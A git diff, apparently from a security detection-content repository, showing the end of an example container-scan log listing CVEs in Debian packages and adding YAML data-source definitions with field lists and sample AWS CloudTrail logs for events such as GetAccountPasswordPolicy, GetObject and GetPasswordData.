+  {"key": "package_name", "value": "openssl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2017-7246", "description":
+  "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c
+  in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE
+  of size 268) or possibly have unspecified other impact via a crafted file.", "uri":
+  "https://security-tracker.debian.org/tracker/CVE-2017-7246", "severity": "INFORMATIONAL",
+  "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name",
+  "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2019-20838", "description":
+  "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is
+  disabled, and \\X or \\R has more than one fixed quantifier, a related issue to
+  CVE-2019-20454.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20838",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+  {"name": "CVE-2017-7245", "description": "Stack-based buffer overflow in the pcre32_copy_substring
+  function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause
+  a denial of service (WRITE of size 4) or possibly have unspecified other impact
+  via a crafted file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-7245",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]},
+  {"name": "CVE-2017-16231", "description": "** DISPUTED ** In PCRE 8.41, after compiling,
+  a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c
+  because of a self-recursive call. NOTE: third parties dispute the relevance of this
+  report, noting that there are options that can be used to limit the amount of stack
+  that is used.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16231",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+  {"name": "CVE-2017-11164", "description": "In PCRE 8.41, the OP_KETRMAX feature
+  in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion)
+  when processing a crafted regular expression.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-11164",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.8"}]},
+  {"name": "CVE-2011-4116", "description": "_is_safe in the File::Temp module for
+  Perl does not properly handle symlinks.", "uri": "https://security-tracker.debian.org/tracker/CVE-2011-4116",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "5.28.1-6+deb10u1"}, {"key": "package_name", "value": "perl"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2019-19882", "description": "shadow 4.8, in certain circumstances
+  affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain
+  root access because setuid programs are misconfigured. Specifically, this affects
+  shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid,
+  and without a PAM configuration suitable for use with setuid account management
+  tools. This combination leads to account management tools (groupadd, groupdel, groupmod,
+  useradd, userdel, usermod) that can easily be used by unprivileged local users to
+  escalate privileges to root in multiple ways. This issue became much more relevant
+  in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod
+  calls to suidusbins were fixed in the upstream Makefile which is now included in
+  the release version 4.8).", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19882",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.9"}]},
+  {"name": "CVE-2007-5686", "description": "initscripts in rPath Linux 1 sets insecure
+  permissions for the /var/log/btmp file, which allows local users to obtain sensitive
+  information regarding authentication attempts.  NOTE: because sshd detects the insecure
+  permissions and does not log certain events, this also prevents sshd from logging
+  failed authentication attempts by remote attackers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2007-5686",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.9"}]},
+  {"name": "CVE-2013-4235", "description": "shadow: TOCTOU (time-of-check time-of-use)
+  race condition when copying and removing directory trees", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4235",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1:4.5-1.1"}, {"key": "package_name", "value": "shadow"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:M/Au:N/C:N/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.3"}]},
+  {"name": "CVE-2020-13529", "description": "An exploitable denial-of-service vulnerability
+  exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server
+  running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker
+  can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13529", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+  {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:A/AC:M/Au:N/C:N/I:N/A:P"},
+  {"key": "CVSS2_SCORE", "value": "2.9"}]}, {"name": "CVE-2013-4392", "description":
+  "systemd, when updating file permissions, allows local users to change the permissions
+  and SELinux security contexts for arbitrary files via a symlink attack on unspecified
+  files.", "uri": "https://security-tracker.debian.org/tracker/CVE-2013-4392", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"},
+  {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:N"},
+  {"key": "CVSS2_SCORE", "value": "3.3"}]}, {"name": "CVE-2020-13776", "description":
+  "systemd through v245 mishandles numerical usernames such as ones composed of decimal
+  digits or 0x followed by hex digits, as demonstrated by use of root privileges when
+  privileges of the 0x0 user account were intended. NOTE: this issue exists because
+  of an incomplete fix for CVE-2017-1000082.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-13776",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "6.2"}]},
+  {"name": "CVE-2019-20386", "description": "An issue was discovered in button_open
+  in login/logind-button.c in systemd before 243. When executing the udevadm trigger
+  command, a memory leak may occur.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-20386",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]},
+  {"name": "CVE-2019-9923", "description": "pax_decode_header in sparse.c in GNU Tar
+  before 1.32 had a NULL pointer dereference when parsing certain archives that have
+  malformed extended headers.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-9923",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]},
+  {"name": "CVE-2005-2541", "description": "Tar 1.15.1 does not properly warn the
+  user when extracting setuid or setgid files, which may allow local users or remote
+  attackers to gain privileges.", "uri": "https://security-tracker.debian.org/tracker/CVE-2005-2541",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, {"key": "CVSS2_SCORE", "value": "10"}]},
+  {"name": "CVE-2021-20193", "description": "A flaw was found in the src/list.c of
+  tar 1.33 and earlier. This flaw allows an attacker who can submit a crafted input
+  file to tar to cause uncontrolled consumption of memory. The highest threat from
+  this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-20193",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "1.30+dfsg-6"}, {"key": "package_name", "value": "tar"}, {"key": "CVSS2_VECTOR",
+  "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]},
+  {"name": "CVE-2017-17973", "description": "** DISPUTED ** In LibTIFF 4.0.8, there
+  is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c. NOTE:
+  there is a third-party report of inability to reproduce this issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-17973",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "6.8"}]}, {"name": "CVE-2020-35521", "description": "A flaw was found in libtiff.
+  Due to a memory allocation failure in tif_read.c, a crafted TIFF file can lead to
+  an abort, resulting in denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35521",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "4.3"}]}, {"name": "CVE-2014-8130", "description": "The _TIFFmalloc function in
+  tif_unix.c in LibTIFF 4.0.3 does not reject a zero size, which allows remote attackers
+  to cause a denial of service (divide-by-zero error and application crash) via a
+  crafted TIFF image that is mishandled by the TIFFWriteScanline function in tif_write.c,
+  as demonstrated by tiffdither.", "uri": "https://security-tracker.debian.org/tracker/CVE-2014-8130",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "4.3"}]}, {"name": "CVE-2017-5563", "description": "LibTIFF version 4.0.7 is vulnerable
+  to a heap-based buffer over-read in tif_lzw.c resulting in DoS or code execution
+  via a crafted bmp image to tools/bmp2tiff.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-5563",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "6.8"}]}, {"name": "CVE-2020-35522", "description": "In LibTIFF, there is a memory
+  malloc failure in tif_pixarlog.c. A crafted TIFF document can lead to an abort,
+  resulting in a remote denial of service attack.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-35522",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "4.3"}]}, {"name": "CVE-2017-9117", "description": "In LibTIFF 4.0.7, the program
+  processes BMP images without verifying that biWidth and biHeight in the bitmap-information
+  header match the actual input, leading to a heap-based buffer over-read in bmp2tiff.",
+  "uri": "https://security-tracker.debian.org/tracker/CVE-2017-9117", "severity":
+  "INFORMATIONAL", "attributes": [{"key": "package_version", "value": "4.1.0+git191117-2~deb10u2"},
+  {"key": "package_name", "value": "tiff"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"},
+  {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2017-16232", "description":
+  "** DISPUTED ** LibTIFF 4.0.8 has multiple memory leak vulnerabilities, which allow
+  attackers to cause a denial of service (memory consumption), as demonstrated by
+  tif_open.c, tif_lzw.c, and tif_aux.c. NOTE: Third parties were unable to reproduce
+  the issue.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16232",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "5"}]}, {"name": "CVE-2018-10126", "description": "LibTIFF 4.0.9 has a NULL pointer
+  dereference in the jpeg_fdct_16x16 function in jfdctint.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-10126",
+  "severity": "INFORMATIONAL", "attributes": [{"key": "package_version", "value":
+  "4.1.0+git191117-2~deb10u2"}, {"key": "package_name", "value": "tiff"}, {"key":
+  "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value":
+  "4.3"}]}, {"name": "CVE-2021-22924", "description": "libcurl keeps previously used
+  connections in a connection pool for subsequenttransfers to reuse, if one of them
+  matches the setup.Due to errors in the logic, the config matching function did not
+  take ''issuercert'' into account and it compared the involved paths *case insensitively*,which
+  could lead to libcurl reusing wrong connections.File paths are, or can be, case
+  sensitive on many systems but not all, and caneven vary depending on used file systems.The
+  comparison also didn''t include the ''issuer cert'' which a transfer can setto qualify
+  how to verify the server certificate.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22924",
+  "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"},
+  {"key": "package_name", "value": "curl"}]}, {"name": "CVE-2021-38115", "description":
+  "read_header_tga in gd_tga.c in the GD Graphics Library (aka LibGD) through 2.3.2
+  allows remote attackers to cause a denial of service (out-of-bounds read) via a
+  crafted TGA file.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-38115",
+  "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"},
+  {"key": "package_name", "value": "libgd2"}]}, {"name": "CVE-2021-3618", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3618",
+  "severity": "UNDEFINED", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"},
+  {"key": "package_name", "value": "nginx"}]}], "findingSeverityCounts": {"HIGH":
+  2, "MEDIUM": 14, "INFORMATIONAL": 63, "LOW": 22, "UNDEFINED": 3}}}, "requestID":
+  "23c19e2d-c48b-4265-b4eb-853e7b325780", "eventID": "6c94a9b2-36dc-43f8-a6dd-4ec839ded8af",
+  "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management"}'
diff --git a/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml b/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml
new file mode 100644
index 0000000000..27644d074d
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getaccountpasswordpolicy.yml
@@ -0,0 +1,99 @@
+name: AWS CloudTrail GetAccountPasswordPolicy
+id: 439bdc53-6e4b-4cd7-b326-86c7317fd396
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetAccountPasswordPolicy
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- action
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- status
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDASBMSCQHHTH5NDF4GD", "arn": "arn:aws:iam::111111111111:user/strt_fonder", "accountId":
+  "111111111111", "accessKeyId": "AKIASBMSCQHH5A5NJDM5", "userName": "strt_fonder"},
+  "eventTime": "2023-01-26T22:39:06Z", "eventSource": "iam.amazonaws.com", "eventName":
+  "GetAccountPasswordPolicy", "awsRegion": "us-east-1", "sourceIPAddress": "23.93.193.7",
+  "userAgent": "aws-cli/2.7.25 Python/3.10.6 Darwin/21.6.0 source/x86_64 prompt/off
+  command/iam.get-account-password-policy", "requestParameters": null, "responseElements":
+  null, "requestID": "098fd0dd-e42e-4249-91fb-9637925bf2fe", "eventID": "5eb0fb9b-18ff-4be9-b90d-107a290e1d5c",
+  "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "iam.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_getobject.yml b/data_sources/aws_cloudtrail_getobject.yml
new file mode 100644
index 0000000000..c7277dc3ab
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getobject.yml
@@ -0,0 +1,113 @@
+name: AWS CloudTrail GetObject
+id: 5063cb10-84c0-44af-ade4-ab9ecad11dfe
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetObject
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- additionalEventData.AuthenticationMethod
+- additionalEventData.CipherSuite
+- additionalEventData.SignatureVersion
+- additionalEventData.bytesTransferredIn
+- additionalEventData.bytesTransferredOut
+- additionalEventData.x-amz-id-2
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestID
+- requestParameters.Host
+- requestParameters.bucketName
+- requestParameters.key
+- requestParameters.x-amz-request-payer
+- resources{}.ARN
+- resources{}.accountId
+- resources{}.type
+- responseElements
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.type
+- userIdentity.userName
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId":
+  "AIDAYTOGP2RLCNEAQXWZV", "arn": "arn:aws:iam::111111111111:user/console", "accountId":
+  "111111111111", "accessKeyId": "AKIAYTOGP2RLF5EAXXXX", "userName": "console"}, "eventTime":
+  "2023-04-11T01:18:47Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
+  "awsRegion": "us-west-2", "sourceIPAddress": "12.26.0.38", "userAgent": "[aws-cli/2.11.2
+  Python/3.11.2 Darwin/22.3.0 exe/x86_64 prompt/off command/s3.cp]", "requestParameters":
+  {"bucketName": "security-content", "Host": "security-content.s3.us-west-2.amazonaws.com",
+  "x-amz-request-payer": "requester", "key": "stories/windows_discovery_techniques.yml"},
+  "responseElements": null, "additionalEventData": {"SignatureVersion": "SigV4", "CipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "bytesTransferredIn": 0, "AuthenticationMethod":
+  "AuthHeader", "x-amz-id-2": "dcha0yrujT+O4FHsYxHx48KxMk4+wtO7MaNRwFOFs46R1PynKWcCsbLScYEFytN+Vt35hyq1cek=",
+  "bytesTransferredOut": 1136}, "requestID": "GVSEBM08Z93FB3BT", "eventID": "2b7231c2-892d-464e-8880-1e4f81ae7eb2",
+  "readOnly": true, "resources": [{"type": "AWS::S3::Object", "ARN": "arn:aws:s3:::security-content/stories/windows_discovery_techniques.yml"},
+  {"accountId": "111111111111", "type": "AWS::S3::Bucket", "ARN": "arn:aws:s3:::security-content"}],
+  "eventType": "AwsApiCall", "managementEvent": false, "recipientAccountId": "111111111111",
+  "eventCategory": "Data", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite":
+  "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "security-content.s3.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_getpassworddata.yml b/data_sources/aws_cloudtrail_getpassworddata.yml
new file mode 100644
index 0000000000..7f2aa377f6
--- /dev/null
+++ b/data_sources/aws_cloudtrail_getpassworddata.yml
@@ -0,0 +1,115 @@
+name: AWS CloudTrail GetPasswordData
+id: 6ff2ce99-85b1-4c17-888a-56dbc3570671
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail GetPasswordData
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- change_type
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- errorCode
+- errorMessage
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- eventtype
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- reason
+- recipientAccountId
+- region
+- requestID
+- requestParameters.instanceId
+- responseElements
+- result
+- result_id
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- tlsDetails.cipherSuite
+- tlsDetails.clientProvidedHostHeader
+- tlsDetails.tlsVersion
+- user
+- userAgent
+- userIdentity.accessKeyId
+- userIdentity.accountId
+- userIdentity.arn
+- userIdentity.principalId
+- userIdentity.sessionContext.attributes.creationDate
+- userIdentity.sessionContext.attributes.mfaAuthenticated
+- userIdentity.sessionContext.sessionIssuer.accountId
+- userIdentity.sessionContext.sessionIssuer.arn
+- userIdentity.sessionContext.sessionIssuer.principalId
+- userIdentity.sessionContext.sessionIssuer.type
+- userIdentity.sessionContext.sessionIssuer.userName
+- userIdentity.type
+- userName
+- user_access_key
+- user_agent
+- user_arn
+- user_group_id
+- user_id
+- user_name
+- user_type
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
+example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId":
+  "AROAYTOGP2RLP5AASA6I5:aws-go-sdk-1660169051746043000", "arn": "arn:aws:sts::111111111111:assumed-role/sample-role-used-by-stratus-for-ec2-password-data/aws-go-sdk-1660169051746043000",
+  "accountId": "111111111111", "accessKeyId": "ASIAYTOGP2RLLY5RQXEF", "sessionContext":
+  {"sessionIssuer": {"type": "Role", "principalId": "AROAYTOGP2RLP5AASA6I5", "arn":
+  "arn:aws:iam::111111111111:role/sample-role-used-by-stratus-for-ec2-password-data",
+  "accountId": "111111111111", "userName": "sample-role-used-by-stratus-for-ec2-password-data"},
+  "webIdFederationData": {}, "attributes": {"creationDate": "2022-08-10T22:04:12Z",
+  "mfaAuthenticated": "false"}}}, "eventTime": "2022-08-10T22:04:13Z", "eventSource":
+  "ec2.amazonaws.com", "eventName": "GetPasswordData", "awsRegion": "us-west-2", "sourceIPAddress":
+  "142.254.89.27", "userAgent": "stratus-red-team_e3e4b259-63a4-4d89-acd5-a7286a279bb8",
+  "errorCode": "Client.UnauthorizedOperation", "errorMessage": "You are not authorized
+  to perform this operation. Encoded authorization failure message: OwnXKlWs2vtfsyXhkYTFO35PfDwIeH4oGadP2dmbdguXBDpSfP-65XwZU4JdWht_u8p9BlgIZ0QOYIzmm5-ApXc7HsgOynmQvF4vFNUxxiuY0w-VRNBiuPmphwnJqYln8pTJogn0DfcleY5TIuDEFwmGvZHnGMmK1kXJ1VcUiQvbK_vuDpSqIDFz-jqcnOTjzsC4DXlTZkHLL1HEeNVIjI9HCEWYG4CuG9Ti8BQ0AnGVkU8oqvtS6iyVlnPI9oId5_AWpfmE1ijhNKbgFH77DjRn6QyR5rGkGYYFpvaIyMvX33Vti4RzfAyJdpuzMgp6tV-q_Rbh0ikwBJvUtiiGfmqzdQynfRNDQmXJ3ruifOjGmUz34M90SGFJKi5CVHGThtO3UWj9EqYXpKdu_JgTYEqxWvRBopB--V7tOap8XKuz7W3rWyHN2clHA0yooLZ3DV34LWgzzDp9Iv66829HSTwGz7h2P0sGdCNuV_FCxwQzWYa8f6_h1By90MvWUvmEDLSzOfA_PF6BcqCmV8XBiPUvCMPebDSGmPwSa371J5Yn2xEiuQadfuNYRLZnd2i1V_NF9ax67BdZ",
+  "requestParameters": {"instanceId": "i-7sap2krlslv6adrs"}, "responseElements": null,
+  "requestID": "87368810-7b30-4ff9-b097-702778a53f22", "eventID": "0cdd3757-296a-4454-9619-d0f8be335081",
+  "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId":
+  "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2",
+  "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "ec2.us-west-2.amazonaws.com"}}'
diff --git a/data_sources/aws_cloudtrail_jobcreated.yml b/data_sources/aws_cloudtrail_jobcreated.yml
new file mode 100644
index 0000000000..c81ed19015
--- /dev/null
+++ b/data_sources/aws_cloudtrail_jobcreated.yml
@@ -0,0 +1,84 @@
+name: AWS CloudTrail JobCreated
+id: 6473289b-d097-4c86-a837-3cc5ae408155
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for AWS CloudTrail JobCreated
+source: aws_cloudtrail
+sourcetype: aws:cloudtrail
+separator: eventName
+supported_TA:
+- name: Splunk Add-on for Amazon Web Services (AWS)
+  url: https://splunkbase.splunk.com/app/1876
+  version: 7.4.1
+fields:
+- _time
+- app
+- awsRegion
+- aws_account_id
+- command
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- desc
+- dest
+- dvc
+- errorCode
+- eventCategory
+- eventID
+- eventName
+- eventSource
+- eventTime
+- eventType
+- eventVersion
+- host
+- index
+- linecount
+- managementEvent
+- msg
+- object_category
+- product
+- punct
+- readOnly
+- recipientAccountId
+- region
+- requestParameters
+- responseElements
+- serviceEventDetails.jobArn
+- serviceEventDetails.jobEventId
+- serviceEventDetails.jobId
+- serviceEventDetails.status
+- signature
+- source
+- sourceIPAddress
+- sourcetype
+- splunk_server
+- src
+- src_ip
+- start_time
+- timeendpos
+- timestartpos
+- userAgent
+- userIdentity.accountId
+- userIdentity.invokedBy
+- user_agent
+- user_group_id
+- vendor
+- vendor_account
+- vendor_product
+- vendor_region
